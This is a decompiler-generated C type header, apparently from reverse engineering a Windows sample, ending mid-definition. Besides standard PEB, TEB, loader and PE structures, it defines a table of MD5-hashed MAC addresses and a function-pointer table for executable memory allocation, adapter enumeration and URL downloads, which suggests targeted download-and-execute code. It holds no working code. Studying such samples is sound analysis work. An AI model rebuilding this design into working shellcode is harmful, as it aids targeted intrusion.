typedef unsigned char undefined; typedef unsigned char byte; typedef long long longlong; typedef unsigned char uchar; typedef unsigned int uint; typedef unsigned long ulong; typedef unsigned long long ulonglong; typedef unsigned char undefined1; typedef unsigned short undefined2; typedef unsigned int undefined4; typedef unsigned long long undefined6; typedef unsigned long long undefined8; typedef unsigned short ushort; typedef short wchar_t; typedef struct mac_md5_list_entry_t mac_md5_list_entry_t, *Pmac_md5_list_entry_t; struct mac_md5_list_entry_t { uint count; uint md5mac1[4]; byte padding1[4]; uint md5mac2[4]; byte padding2[4]; }; typedef struct func_ptr_table_t func_ptr_table_t, *Pfunc_ptr_table_t; typedef struct HINSTANCE__ HINSTANCE__, *PHINSTANCE__; typedef struct HINSTANCE__ * HINSTANCE; typedef HINSTANCE HMODULE; typedef wchar_t WCHAR; typedef WCHAR * LPCWSTR; typedef void * HANDLE; typedef ulong DWORD; typedef void * LPVOID; typedef ulong ULONG_PTR; typedef ULONG_PTR SIZE_T; typedef WCHAR * LPWSTR; typedef int WINBOOL; typedef struct _FILETIME _FILETIME, *P_FILETIME; typedef struct _FILETIME * LPFILETIME; typedef struct _FILETIME FILETIME; typedef struct _SYSTEMTIME _SYSTEMTIME, *P_SYSTEMTIME; typedef struct _SYSTEMTIME * LPSYSTEMTIME; typedef ulong size_t; typedef LPVOID HINTERNET; typedef char CHAR; typedef CHAR * LPCSTR; typedef ULONG_PTR DWORD_PTR; typedef DWORD * LPDWORD; typedef ushort WORD; struct _SYSTEMTIME { WORD wYear; WORD wMonth; WORD wDayOfWeek; WORD wDay; WORD wHour; WORD wMinute; WORD wSecond; WORD wMilliseconds; }; struct _FILETIME { DWORD dwLowDateTime; DWORD dwHighDateTime; }; struct HINSTANCE__ { int unused; }; struct func_ptr_table_t { HMODULE (* LoadLibraryExW)(LPCWSTR, HANDLE, DWORD); LPVOID (* VirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD); DWORD (* GetModuleFileNameW)(HMODULE, LPWSTR, DWORD); WINBOOL (* WritePrivateProfileStringW)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR); void (* GetSystemTimeAsFileTime)(LPFILETIME); WINBOOL (* 
FileTimeToSystemTime)(FILETIME *, LPSYSTEMTIME); WINBOOL (* VirtualFree)(LPVOID, SIZE_T, DWORD); void * (* memcpy)(void *, void *, size_t); int (* memcmp)(void *, void *, size_t); void * (* memset)(void *, int, size_t); int (* swprintf)(char *, char *, ...); int (* sprintf)(char *, char *, ...); char * (* strncat)(char *, char *, size_t); int MD5Init; int MD5Update; int MD5Final; int GetAdaptersAddresses; HINTERNET (* InternetOpenA)(LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD); HINTERNET (* InternetOpenUrlA)(HINTERNET, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR); WINBOOL (* InternetQueryDataAvailable)(HINTERNET, LPDWORD, DWORD, DWORD_PTR); WINBOOL (* InternetReadFile)(HINTERNET, LPVOID, DWORD, LPDWORD); HMODULE (* field_0x54)(LPCWSTR, HANDLE, DWORD); HMODULE (* field_0x58)(LPCWSTR, HANDLE, DWORD); HMODULE (* field_0x5c)(LPCWSTR, HANDLE, DWORD); HMODULE (* field_0x60)(LPCWSTR, HANDLE, DWORD); }; typedef struct _LDR_DATA_TABLE_ENTRY_0x10 _LDR_DATA_TABLE_ENTRY_0x10, *P_LDR_DATA_TABLE_ENTRY_0x10; typedef struct _LIST_ENTRY _LIST_ENTRY, *P_LIST_ENTRY; typedef struct _UNICODE_STRING _UNICODE_STRING, *P_UNICODE_STRING; typedef union _union_9066 _union_9066, *P_union_9066; typedef struct _ACTIVATION_CONTEXT _ACTIVATION_CONTEXT, *P_ACTIVATION_CONTEXT; typedef struct _LDR_DDAG_NODE _LDR_DDAG_NODE, *P_LDR_DDAG_NODE; typedef struct _LDRP_LOAD_CONTEXT _LDRP_LOAD_CONTEXT, *P_LDRP_LOAD_CONTEXT; typedef struct _RTL_BALANCED_NODE _RTL_BALANCED_NODE, *P_RTL_BALANCED_NODE; typedef union _LARGE_INTEGER _LARGE_INTEGER, *P_LARGE_INTEGER; typedef enum _LDR_DLL_LOAD_REASON { LoadReasonAsDataLoad=6, LoadReasonAsImageLoad=5, LoadReasonDelayloadDependency=3, LoadReasonDynamicForwarderDependency=2, LoadReasonDynamicLoad=4, LoadReasonEnclaveDependency=8, LoadReasonEnclavePrimary=7, LoadReasonStaticDependency=0, LoadReasonStaticForwarderDependency=1, LoadReasonUnknown=9 } _LDR_DLL_LOAD_REASON; typedef struct _struct_9067 _struct_9067, *P_struct_9067; typedef struct _LDR_SERVICE_TAG_RECORD 
_LDR_SERVICE_TAG_RECORD, *P_LDR_SERVICE_TAG_RECORD; typedef struct _LDRP_CSLIST _LDRP_CSLIST, *P_LDRP_CSLIST; typedef enum _LDR_DDAG_STATE { LdrModulesCondensed=6, LdrModulesInitError=1, LdrModulesInitializing=8, LdrModulesMapped=2, LdrModulesMapping=1, LdrModulesMerged=0, LdrModulesPlaceHolder=0, LdrModulesReadyToInit=7, LdrModulesReadyToRun=9, LdrModulesSnapError=2, LdrModulesSnapped=5, LdrModulesSnapping=4, LdrModulesUnloaded=3, LdrModulesUnloading=4, LdrModulesWaitingForDependencies=3 } _LDR_DDAG_STATE; typedef struct _SINGLE_LIST_ENTRY _SINGLE_LIST_ENTRY, *P_SINGLE_LIST_ENTRY; typedef union _union_9970 _union_9970, *P_union_9970; typedef union _union_9975 _union_9975, *P_union_9975; typedef union _union_1261 _union_1261, *P_union_1261; typedef union anon__struct_9067_bitfield_1 anon__struct_9067_bitfield_1, *Panon__struct_9067_bitfield_1; typedef struct _struct_9972 _struct_9972, *P_struct_9972; typedef struct _struct_1262 _struct_1262, *P_struct_1262; typedef struct _struct_1263 _struct_1263, *P_struct_1263; struct _ACTIVATION_CONTEXT { }; union anon__struct_9067_bitfield_1 { ulong PackagedBinary:1; // : bits 0 ulong MarkedForRemoval:1; // : bits 1 ulong ImageDll:1; // : bits 2 ulong LoadNotificationsSent:1; // : bits 3 ulong TelemetryEntryProcessed:1; // : bits 4 ulong ProcessStaticImport:1; // : bits 5 ulong InLegacyLists:1; // : bits 6 ulong InIndexes:1; // : bits 7 ulong ShimDll:1; // : bits 8 ulong InExceptionTable:1; // : bits 9 ulong ReservedFlags1:2; // : bits 10-11 ulong LoadInProgress:1; // : bits 12 ulong LoadConfigProcessed:1; // : bits 13 ulong EntryProcessed:1; // : bits 14 ulong ProtectDelayLoad:1; // : bits 15 ulong ReservedFlags3:2; // : bits 16-17 ulong DontCallForThreads:1; // : bits 18 ulong ProcessAttachCalled:1; // : bits 19 ulong ProcessAttachFailed:1; // : bits 20 ulong CorDeferredValidate:1; // : bits 21 ulong CorImage:1; // : bits 22 ulong DontRelocate:1; // : bits 23 ulong CorILOnly:1; // : bits 24 ulong ChpeImage:1; // : bits 25 
ulong ReservedFlags5:2; // : bits 26-27 ulong Redirected:1; // : bits 28 ulong ReservedFlags6:2; // : bits 29-30 ulong CompatDatabaseProcessed:1; // : bits 31 }; struct _struct_9067 { union anon__struct_9067_bitfield_1 field_0x0; }; union _union_9975 { uchar Red:1; // : bits 0 uchar Balance:2; // : bits 1-2 ulong ParentValue; }; struct _struct_9972 { struct _RTL_BALANCED_NODE * Left; struct _RTL_BALANCED_NODE * Right; }; union _union_9970 { struct _RTL_BALANCED_NODE * Children[2]; struct _struct_9972 field1; }; struct _RTL_BALANCED_NODE { union _union_9970 field_0x0; union _union_9975 field_0x8; }; struct _struct_1262 { ulong LowPart; long HighPart; }; struct _struct_1263 { ulong LowPart; long HighPart; }; union _union_1261 { struct _struct_1262 field0; struct _struct_1263 u; longlong QuadPart; }; struct _LIST_ENTRY { struct _LIST_ENTRY * Flink; struct _LIST_ENTRY * Blink; }; struct _SINGLE_LIST_ENTRY { struct _SINGLE_LIST_ENTRY * Next; }; struct _LDRP_CSLIST { struct _SINGLE_LIST_ENTRY * Tail; }; struct _LDR_DDAG_NODE { struct _LIST_ENTRY Modules; struct _LDR_SERVICE_TAG_RECORD * ServiceTagList; ulong LoadCount; ulong LoadWhileUnloadingCount; ulong LowestLink; struct _LDRP_CSLIST Dependencies; struct _LDRP_CSLIST IncomingDependencies; enum _LDR_DDAG_STATE State; struct _SINGLE_LIST_ENTRY CondenseLink; ulong PreorderNumber; }; union _union_9066 { uchar FlagGroup[4]; ulong Flags; struct _struct_9067 field2; }; struct _UNICODE_STRING { ushort Length; ushort MaximumLength; wchar_t * Buffer; }; union _LARGE_INTEGER { union _union_1261 field0; }; struct _LDR_DATA_TABLE_ENTRY_0x10 { struct _LIST_ENTRY InInitializationOrderLinks; void * DllBase; void * EntryPoint; ulong SizeOfImage; struct _UNICODE_STRING FullDllName; struct _UNICODE_STRING BaseDllName; union _union_9066 field_0x24; ushort ObsoleteLoadCount; ushort TlsIndex; struct _LIST_ENTRY HashLinks; ulong TimeDateStamp; struct _ACTIVATION_CONTEXT * EntryPointActivationContext; void * Lock; struct _LDR_DDAG_NODE * 
DdagNode; struct _LIST_ENTRY NodeModuleLink; struct _LDRP_LOAD_CONTEXT * LoadContext; void * ParentDllBase; void * SwitchBackContext; struct _RTL_BALANCED_NODE BaseAddressIndexNode; struct _RTL_BALANCED_NODE MappingInfoIndexNode; ulong OriginalBase; long Padding_84; union _LARGE_INTEGER LoadTime; ulong BaseNameHashValue; enum _LDR_DLL_LOAD_REASON LoadReason; ulong ImplicitPathOptions; ulong ReferenceCount; ulong DependentLoadFlags; uchar SigningLevel; char __PADDING__[3]; }; struct _LDR_SERVICE_TAG_RECORD { struct _LDR_SERVICE_TAG_RECORD * Next; ulong ServiceTag; }; struct _LDRP_LOAD_CONTEXT { }; #define MEM_COMMIT 4096 #define PAGE_READWRITE 4 #define PAGE_EXECUTE_READWRITE 64 #define ERROR_BUFFER_OVERFLOW 111 typedef struct _PROCESSOR_NUMBER _PROCESSOR_NUMBER, *P_PROCESSOR_NUMBER; struct _PROCESSOR_NUMBER { ushort Group; uchar Number; uchar Reserved; }; typedef struct _PEB _PEB, *P_PEB; typedef union _union_7907 _union_7907, *P_union_7907; typedef struct _PEB_LDR_DATA _PEB_LDR_DATA, *P_PEB_LDR_DATA; typedef struct _RTL_USER_PROCESS_PARAMETERS _RTL_USER_PROCESS_PARAMETERS, *P_RTL_USER_PROCESS_PARAMETERS; typedef struct _RTL_CRITICAL_SECTION _RTL_CRITICAL_SECTION, *P_RTL_CRITICAL_SECTION; typedef union _SLIST_HEADER _SLIST_HEADER, *P_SLIST_HEADER; typedef union _union_7913 _union_7913, *P_union_7913; typedef union _union_7915 _union_7915, *P_union_7915; typedef union _ULARGE_INTEGER _ULARGE_INTEGER, *P_ULARGE_INTEGER; typedef struct _ACTIVATION_CONTEXT_DATA _ACTIVATION_CONTEXT_DATA, *P_ACTIVATION_CONTEXT_DATA; typedef struct _ASSEMBLY_STORAGE_MAP _ASSEMBLY_STORAGE_MAP, *P_ASSEMBLY_STORAGE_MAP; typedef struct _FLS_CALLBACK_INFO _FLS_CALLBACK_INFO, *P_FLS_CALLBACK_INFO; typedef union _union_7928 _union_7928, *P_union_7928; typedef struct _LEAP_SECOND_DATA _LEAP_SECOND_DATA, *P_LEAP_SECOND_DATA; typedef union _union_7932 _union_7932, *P_union_7932; typedef struct _struct_7908 _struct_7908, *P_struct_7908; typedef struct _CURDIR _CURDIR, *P_CURDIR; typedef struct 
_RTL_DRIVE_LETTER_CURDIR _RTL_DRIVE_LETTER_CURDIR, *P_RTL_DRIVE_LETTER_CURDIR; typedef struct _RTL_CRITICAL_SECTION_DEBUG _RTL_CRITICAL_SECTION_DEBUG, *P_RTL_CRITICAL_SECTION_DEBUG; typedef union _union_1270 _union_1270, *P_union_1270; typedef struct _struct_7914 _struct_7914, *P_struct_7914; typedef union _union_1318 _union_1318, *P_union_1318; typedef struct _struct_7929 _struct_7929, *P_struct_7929; typedef struct _struct_7933 _struct_7933, *P_struct_7933; typedef union anon__struct_7908_bitfield_1 anon__struct_7908_bitfield_1, *Panon__struct_7908_bitfield_1; typedef struct _STRING _STRING, *P_STRING; typedef struct _struct_1271 _struct_1271, *P_struct_1271; typedef union anon__struct_7914_bitfield_1 anon__struct_7914_bitfield_1, *Panon__struct_7914_bitfield_1; typedef struct _struct_1319 _struct_1319, *P_struct_1319; typedef struct _struct_1320 _struct_1320, *P_struct_1320; typedef union anon__struct_7929_bitfield_1 anon__struct_7929_bitfield_1, *Panon__struct_7929_bitfield_1; typedef union anon__struct_7933_bitfield_1 anon__struct_7933_bitfield_1, *Panon__struct_7933_bitfield_1; union anon__struct_7929_bitfield_1 { ulong HeapTracingEnabled:1; // : bits 0 ulong CritSecTracingEnabled:1; // : bits 1 ulong LibLoaderTracingEnabled:1; // : bits 2 ulong SpareTracingBits:29; // : bits 3-31 }; struct _struct_7929 { union anon__struct_7929_bitfield_1 field_0x0; }; union _union_7928 { ulong TracingFlags; struct _struct_7929 field1; }; union anon__struct_7908_bitfield_1 { uchar ImageUsesLargePages:1; // : bits 0 uchar IsProtectedProcess:1; // : bits 1 uchar IsImageDynamicallyRelocated:1; // : bits 2 uchar SkipPatchingUser32Forwarders:1; // : bits 3 uchar IsPackagedProcess:1; // : bits 4 uchar IsAppContainer:1; // : bits 5 uchar IsProtectedProcessLight:1; // : bits 6 uchar IsLongPathAwareProcess:1; // : bits 7 }; struct _struct_7908 { union anon__struct_7908_bitfield_1 field_0x0; }; union _union_7907 { uchar BitField; struct _struct_7908 field1; }; union 
anon__struct_7933_bitfield_1 { ulong SixtySecondEnabled:1; // : bits 0 ulong Reserved:31; // : bits 1-31 }; struct _struct_7933 { union anon__struct_7933_bitfield_1 field_0x0; }; union _union_7932 { ulong LeapSecondFlags; struct _struct_7933 field1; }; union anon__struct_7914_bitfield_1 { ulong ProcessInJob:1; // : bits 0 ulong ProcessInitializing:1; // : bits 1 ulong ProcessUsingVEH:1; // : bits 2 ulong ProcessUsingVCH:1; // : bits 3 ulong ProcessUsingFTH:1; // : bits 4 ulong ProcessPreviouslyThrottled:1; // : bits 5 ulong ProcessCurrentlyThrottled:1; // : bits 6 ulong ProcessImagesHotPatched:1; // : bits 7 ulong ReservedBits0:24; // : bits 8-31 }; struct _struct_7914 { union anon__struct_7914_bitfield_1 field_0x0; }; union _union_7913 { ulong CrossProcessFlags; struct _struct_7914 field1; }; struct _struct_1319 { ulong LowPart; ulong HighPart; }; struct _struct_1320 { ulong LowPart; ulong HighPart; }; union _union_1318 { struct _struct_1319 field0; struct _struct_1320 u; ulonglong QuadPart; }; union _ULARGE_INTEGER { union _union_1318 field0; }; union _union_7915 { void * KernelCallbackTable; void * UserSharedInfoPtr; }; struct _PEB { uchar InheritedAddressSpace; uchar ReadImageFileExecOptions; uchar BeingDebugged; union _union_7907 field_0x3; void * Mutant; void * ImageBaseAddress; struct _PEB_LDR_DATA * Ldr; struct _RTL_USER_PROCESS_PARAMETERS * ProcessParameters; void * SubSystemData; void * ProcessHeap; struct _RTL_CRITICAL_SECTION * FastPebLock; union _SLIST_HEADER * AtlThunkSListPtr; void * IFEOKey; union _union_7913 field_0x28; union _union_7915 field_0x2c; ulong SystemReserved; union _SLIST_HEADER * AtlThunkSListPtr32; void * ApiSetMap; ulong TlsExpansionCounter; void * TlsBitmap; ulong TlsBitmapBits[2]; void * ReadOnlySharedMemoryBase; void * SharedData; void * * ReadOnlyStaticServerData; void * AnsiCodePageData; void * OemCodePageData; void * UnicodeCaseTableData; ulong NumberOfProcessors; ulong NtGlobalFlag; long Padding_30; union _LARGE_INTEGER 
CriticalSectionTimeout; ulong HeapSegmentReserve; ulong HeapSegmentCommit; ulong HeapDeCommitTotalFreeThreshold; ulong HeapDeCommitFreeBlockThreshold; ulong NumberOfHeaps; ulong MaximumNumberOfHeaps; void * * ProcessHeaps; void * GdiSharedHandleTable; void * ProcessStarterHelper; ulong GdiDCAttributeList; struct _RTL_CRITICAL_SECTION * LoaderLock; ulong OSMajorVersion; ulong OSMinorVersion; ushort OSBuildNumber; ushort OSCSDVersion; ulong OSPlatformId; ulong ImageSubsystem; ulong ImageSubsystemMajorVersion; ulong ImageSubsystemMinorVersion; ulong ActiveProcessAffinityMask; ulong GdiHandleBuffer[34]; void * PostProcessInitRoutine; void * TlsExpansionBitmap; ulong TlsExpansionBitmapBits[32]; ulong SessionId; union _ULARGE_INTEGER AppCompatFlags; union _ULARGE_INTEGER AppCompatFlagsUser; void * pShimData; void * AppCompatInfo; struct _UNICODE_STRING CSDVersion; struct _ACTIVATION_CONTEXT_DATA * ActivationContextData; struct _ASSEMBLY_STORAGE_MAP * ProcessAssemblyStorageMap; struct _ACTIVATION_CONTEXT_DATA * SystemDefaultActivationContextData; struct _ASSEMBLY_STORAGE_MAP * SystemAssemblyStorageMap; ulong MinimumStackCommit; struct _FLS_CALLBACK_INFO * FlsCallback; struct _LIST_ENTRY FlsListHead; void * FlsBitmap; ulong FlsBitmapBits[4]; ulong FlsHighIndex; void * WerRegistrationData; void * WerShipAssertPtr; void * pUnused; void * pImageHeaderHash; union _union_7928 field_0x240; long Padding_31; ulonglong CsrServerReadOnlySharedMemoryBase; ulong TppWorkerpListLock; struct _LIST_ENTRY TppWorkerpList; void * WaitOnAddressHashTable[128]; void * TelemetryCoverageHeader; ulong CloudFileFlags; ulong CloudFileDiagFlags; char PlaceholderCompatibilityMode; char PlaceholderCompatibilityModeReserved[7]; struct _LEAP_SECOND_DATA * LeapSecondData; union _union_7932 field_0x474; ulong NtGlobalFlag2; long __PADDING__[1]; }; struct _PEB_LDR_DATA { ulong Length; uchar Initialized; char Padding_32[3]; void * SsHandle; struct _LIST_ENTRY InLoadOrderModuleList; struct _LIST_ENTRY 
InMemoryOrderModuleList; struct _LIST_ENTRY InInitializationOrderModuleList; void * EntryInProgress; uchar ShutdownInProgress; char Padding_33[3]; void * ShutdownThreadId; }; struct _struct_1271 { struct _SINGLE_LIST_ENTRY Next; ushort Depth; ushort CpuId; }; union _union_1270 { ulonglong Alignment; struct _struct_1271 field1; }; struct _RTL_CRITICAL_SECTION { struct _RTL_CRITICAL_SECTION_DEBUG * DebugInfo; long LockCount; long RecursionCount; void * OwningThread; void * LockSemaphore; ulong SpinCount; }; struct _ACTIVATION_CONTEXT_DATA { }; struct _CURDIR { struct _UNICODE_STRING DosPath; void * Handle; }; struct _STRING { ushort Length; ushort MaximumLength; char * Buffer; }; struct _RTL_DRIVE_LETTER_CURDIR { ushort Flags; ushort Length; ulong TimeStamp; struct _STRING DosPath; }; struct _RTL_USER_PROCESS_PARAMETERS { ulong MaximumLength; ulong Length; ulong Flags; ulong DebugFlags; void * ConsoleHandle; ulong ConsoleFlags; void * StandardInput; void * StandardOutput; void * StandardError; struct _CURDIR CurrentDirectory; struct _UNICODE_STRING DllPath; struct _UNICODE_STRING ImagePathName; struct _UNICODE_STRING CommandLine; void * Environment; ulong StartingX; ulong StartingY; ulong CountX; ulong CountY; ulong CountCharsX; ulong CountCharsY; ulong FillAttribute; ulong WindowFlags; ulong ShowWindowFlags; struct _UNICODE_STRING WindowTitle; struct _UNICODE_STRING DesktopInfo; struct _UNICODE_STRING ShellInfo; struct _UNICODE_STRING RuntimeData; struct _RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32]; ulong EnvironmentSize; ulong EnvironmentVersion; void * PackageDependencyData; ulong ProcessGroupId; ulong LoaderThreads; struct _UNICODE_STRING RedirectionDllName; }; struct _LEAP_SECOND_DATA { uchar Enabled; char Padding_35[3]; ulong Count; union _LARGE_INTEGER Data[1]; }; struct _ASSEMBLY_STORAGE_MAP { }; union _SLIST_HEADER { union _union_1270 field0; }; struct _FLS_CALLBACK_INFO { }; struct _RTL_CRITICAL_SECTION_DEBUG { ushort Type; ushort CreatorBackTraceIndex; 
struct _RTL_CRITICAL_SECTION * CriticalSection; struct _LIST_ENTRY ProcessLocksList; ulong EntryCount; ulong ContentionCount; ulong Flags; ushort CreatorBackTraceIndexHigh; ushort SpareUSHORT; }; typedef struct _EXCEPTION_REGISTRATION_RECORD _EXCEPTION_REGISTRATION_RECORD, *P_EXCEPTION_REGISTRATION_RECORD; struct _EXCEPTION_REGISTRATION_RECORD { struct _EXCEPTION_REGISTRATION_RECORD * Next; void * Handler; }; typedef struct _LDR_DATA_TABLE_ENTRY _LDR_DATA_TABLE_ENTRY, *P_LDR_DATA_TABLE_ENTRY; typedef struct _LDR_DATA_TABLE_ENTRY LDR_DATA_TABLE_ENTRY; struct _LDR_DATA_TABLE_ENTRY { struct _LIST_ENTRY InLoadOrderLinks; struct _LIST_ENTRY InMemoryOrderLinks; struct _LIST_ENTRY InInitializationOrderLinks; void * DllBase; void * EntryPoint; ulong SizeOfImage; struct _UNICODE_STRING FullDllName; struct _UNICODE_STRING BaseDllName; union _union_9066 field_0x34; ushort ObsoleteLoadCount; ushort TlsIndex; struct _LIST_ENTRY HashLinks; ulong TimeDateStamp; struct _ACTIVATION_CONTEXT * EntryPointActivationContext; void * Lock; struct _LDR_DDAG_NODE * DdagNode; struct _LIST_ENTRY NodeModuleLink; struct _LDRP_LOAD_CONTEXT * LoadContext; void * ParentDllBase; void * SwitchBackContext; struct _RTL_BALANCED_NODE BaseAddressIndexNode; struct _RTL_BALANCED_NODE MappingInfoIndexNode; ulong OriginalBase; long Padding_84; union _LARGE_INTEGER LoadTime; ulong BaseNameHashValue; enum _LDR_DLL_LOAD_REASON LoadReason; ulong ImplicitPathOptions; ulong ReferenceCount; ulong DependentLoadFlags; uchar SigningLevel; char __PADDING__[3]; }; typedef union anon__struct_7764_bitfield_1 anon__struct_7764_bitfield_1, *Panon__struct_7764_bitfield_1; union anon__struct_7764_bitfield_1 { ulong Offset:31; // : bits 0-30 ulong HasRenderingCommand:1; // : bits 31 }; typedef struct _IMAGE_DATA_DIRECTORY _IMAGE_DATA_DIRECTORY, *P_IMAGE_DATA_DIRECTORY; typedef struct _IMAGE_DATA_DIRECTORY IMAGE_DATA_DIRECTORY; struct _IMAGE_DATA_DIRECTORY { ulong VirtualAddress; ulong Size; }; typedef struct _IMAGE_DOS_HEADER 
_IMAGE_DOS_HEADER, *P_IMAGE_DOS_HEADER; typedef struct _IMAGE_DOS_HEADER IMAGE_DOS_HEADER; typedef struct _IMAGE_NT_HEADERS _IMAGE_NT_HEADERS, *P_IMAGE_NT_HEADERS; typedef struct _IMAGE_FILE_HEADER _IMAGE_FILE_HEADER, *P_IMAGE_FILE_HEADER; typedef struct _IMAGE_FILE_HEADER IMAGE_FILE_HEADER; typedef struct _IMAGE_OPTIONAL_HEADER _IMAGE_OPTIONAL_HEADER, *P_IMAGE_OPTIONAL_HEADER; typedef struct _IMAGE_OPTIONAL_HEADER IMAGE_OPTIONAL_HEADER32; typedef uchar BYTE; // WARNING! conflicting data type names: /winapi_32/IMAGE_DATA_DIRECTORY - /ALL.h/IMAGE_DATA_DIRECTORY struct _IMAGE_DOS_HEADER { ushort e_magic; ushort e_cblp; ushort e_cp; ushort e_crlc; ushort e_cparhdr; ushort e_minalloc; ushort e_maxalloc; ushort e_ss; ushort e_sp; ushort e_csum; ushort e_ip; ushort e_cs; ushort e_lfarlc; ushort e_ovno; ushort e_res[4]; ushort e_oemid; ushort e_oeminfo; ushort e_res2[10]; struct _IMAGE_NT_HEADERS * e_lfanew; }; struct _IMAGE_FILE_HEADER { WORD Machine; WORD NumberOfSections; DWORD TimeDateStamp; DWORD PointerToSymbolTable; DWORD NumberOfSymbols; WORD SizeOfOptionalHeader; WORD Characteristics; }; struct _IMAGE_OPTIONAL_HEADER { WORD Magic; BYTE MajorLinkerVersion; BYTE MinorLinkerVersion; DWORD SizeOfCode; DWORD SizeOfInitializedData; DWORD SizeOfUninitializedData; DWORD AddressOfEntryPoint; DWORD BaseOfCode; DWORD BaseOfData; DWORD ImageBase; DWORD SectionAlignment; DWORD FileAlignment; WORD MajorOperatingSystemVersion; WORD MinorOperatingSystemVersion; WORD MajorImageVersion; WORD MinorImageVersion; WORD MajorSubsystemVersion; WORD MinorSubsystemVersion; DWORD Win32VersionValue; DWORD SizeOfImage; DWORD SizeOfHeaders; DWORD CheckSum; WORD Subsystem; WORD DllCharacteristics; DWORD SizeOfStackReserve; DWORD SizeOfStackCommit; DWORD SizeOfHeapReserve; DWORD SizeOfHeapCommit; DWORD LoaderFlags; DWORD NumberOfRvaAndSizes; IMAGE_DATA_DIRECTORY DataDirectory[16]; }; struct _IMAGE_NT_HEADERS { DWORD Signature; IMAGE_FILE_HEADER FileHeader; IMAGE_OPTIONAL_HEADER32 
OptionalHeader; }; typedef struct _GUID _GUID, *P_GUID; struct _GUID { ulong Data1; ushort Data2; ushort Data3; uchar Data4[8]; }; typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME _RTL_ACTIVATION_CONTEXT_STACK_FRAME, *P_RTL_ACTIVATION_CONTEXT_STACK_FRAME; struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME { struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME * Previous; struct _ACTIVATION_CONTEXT * ActivationContext; ulong Flags; }; typedef struct _TEB _TEB, *P_TEB; typedef struct _NT_TIB _NT_TIB, *P_NT_TIB; typedef struct _CLIENT_ID _CLIENT_ID, *P_CLIENT_ID; typedef struct _ACTIVATION_CONTEXT_STACK _ACTIVATION_CONTEXT_STACK, *P_ACTIVATION_CONTEXT_STACK; typedef struct _GDI_TEB_BATCH _GDI_TEB_BATCH, *P_GDI_TEB_BATCH; typedef union _union_7776 _union_7776, *P_union_7776; typedef struct _TEB_ACTIVE_FRAME _TEB_ACTIVE_FRAME, *P_TEB_ACTIVE_FRAME; typedef union _union_7780 _union_7780, *P_union_7780; typedef union _union_7781 _union_7781, *P_union_7781; typedef union _union_9980 _union_9980, *P_union_9980; typedef struct _struct_7764 _struct_7764, *P_struct_7764; typedef struct _struct_7778 _struct_7778, *P_struct_7778; typedef struct _TEB_ACTIVE_FRAME_CONTEXT _TEB_ACTIVE_FRAME_CONTEXT, *P_TEB_ACTIVE_FRAME_CONTEXT; typedef struct _struct_7782 _struct_7782, *P_struct_7782; typedef union anon__struct_7782_bitfield_1 anon__struct_7782_bitfield_1, *Panon__struct_7782_bitfield_1; struct _struct_7778 { uchar ReservedPad0; uchar ReservedPad1; uchar ReservedPad2; uchar IdealProcessor; }; union _union_7776 { struct _PROCESSOR_NUMBER CurrentIdealProcessor; ulong IdealProcessorValue; struct _struct_7778 field2; }; union _union_9980 { void * FiberData; ulong Version; }; struct _NT_TIB { struct _EXCEPTION_REGISTRATION_RECORD * ExceptionList; void * StackBase; void * StackLimit; void * SubSystemTib; union _union_9980 field_0x10; void * ArbitraryUserPointer; struct _NT_TIB * Self; }; struct _CLIENT_ID { void * UniqueProcess; void * UniqueThread; }; struct _struct_7764 { union 
anon__struct_7764_bitfield_1 field_0x0; }; struct _GDI_TEB_BATCH { struct _struct_7764 field_0x0; ulong HDC; ulong Buffer[310]; }; struct _ACTIVATION_CONTEXT_STACK { struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME * ActiveFrame; struct _LIST_ENTRY FrameListCache; ulong Flags; ulong NextCookieSequenceNumber; ulong StackId; }; union anon__struct_7782_bitfield_1 { ushort SafeThunkCall:1; // : bits 0 ushort InDebugPrint:1; // : bits 1 ushort HasFiberData:1; // : bits 2 ushort SkipThreadAttach:1; // : bits 3 ushort WerInShipAssertCode:1; // : bits 4 ushort RanProcessInit:1; // : bits 5 ushort ClonedThread:1; // : bits 6 ushort SuppressDebugMsg:1; // : bits 7 ushort DisableUserStackWalk:1; // : bits 8 ushort RtlExceptionAttached:1; // : bits 9 ushort InitialThread:1; // : bits 10 ushort SessionAware:1; // : bits 11 ushort LoadOwner:1; // : bits 12 ushort LoaderWorker:1; // : bits 13 ushort SkipLoaderInit:1; // : bits 14 ushort SpareSameTebBits:1; // : bits 15 }; struct _struct_7782 { union anon__struct_7782_bitfield_1 field_0x0; }; union _union_7781 { ushort SameTebFlags; struct _struct_7782 field1; }; union _union_7780 { ushort CrossTebFlags; ushort SpareCrossTebBits:16; // : bits 0-15 }; struct _TEB { struct _NT_TIB NtTib; void * EnvironmentPointer; struct _CLIENT_ID ClientId; void * ActiveRpcHandle; void * ThreadLocalStoragePointer; struct _PEB * ProcessEnvironmentBlock; ulong LastErrorValue; ulong CountOfOwnedCriticalSections; void * CsrClientThread; void * Win32ThreadInfo; ulong User32Reserved[26]; ulong UserReserved[5]; void * WOW32Reserved; ulong CurrentLocale; ulong FpSoftwareStatusRegister; void * ReservedForDebuggerInstrumentation[16]; void * SystemReserved1[26]; char PlaceholderCompatibilityMode; uchar PlaceholderHydrationAlwaysExplicit; char PlaceholderReserved[10]; ulong ProxiedProcessId; struct _ACTIVATION_CONTEXT_STACK _ActivationStack; uchar WorkingOnBehalfTicket[8]; long ExceptionCode; struct _ACTIVATION_CONTEXT_STACK * ActivationContextStackPointer; ulong 
InstrumentationCallbackSp; ulong InstrumentationCallbackPreviousPc; ulong InstrumentationCallbackPreviousSp; uchar InstrumentationCallbackDisabled; uchar SpareBytes[23]; ulong TxFsContext; struct _GDI_TEB_BATCH GdiTebBatch; struct _CLIENT_ID RealClientId; void * GdiCachedProcessHandle; ulong GdiClientPID; ulong GdiClientTID; void * GdiThreadLocalInfo; ulong Win32ClientInfo[62]; void * glDispatchTable[233]; ulong glReserved1[29]; void * glReserved2; void * glSectionInfo; void * glSection; void * glTable; void * glCurrentRC; void * glContext; ulong LastStatusValue; struct _UNICODE_STRING StaticUnicodeString; wchar_t StaticUnicodeBuffer[261]; char Padding_27[2]; void * DeallocationStack; void * TlsSlots[64]; struct _LIST_ENTRY TlsLinks; void * Vdm; void * ReservedForNtRpc; void * DbgSsReserved[2]; ulong HardErrorMode; void * 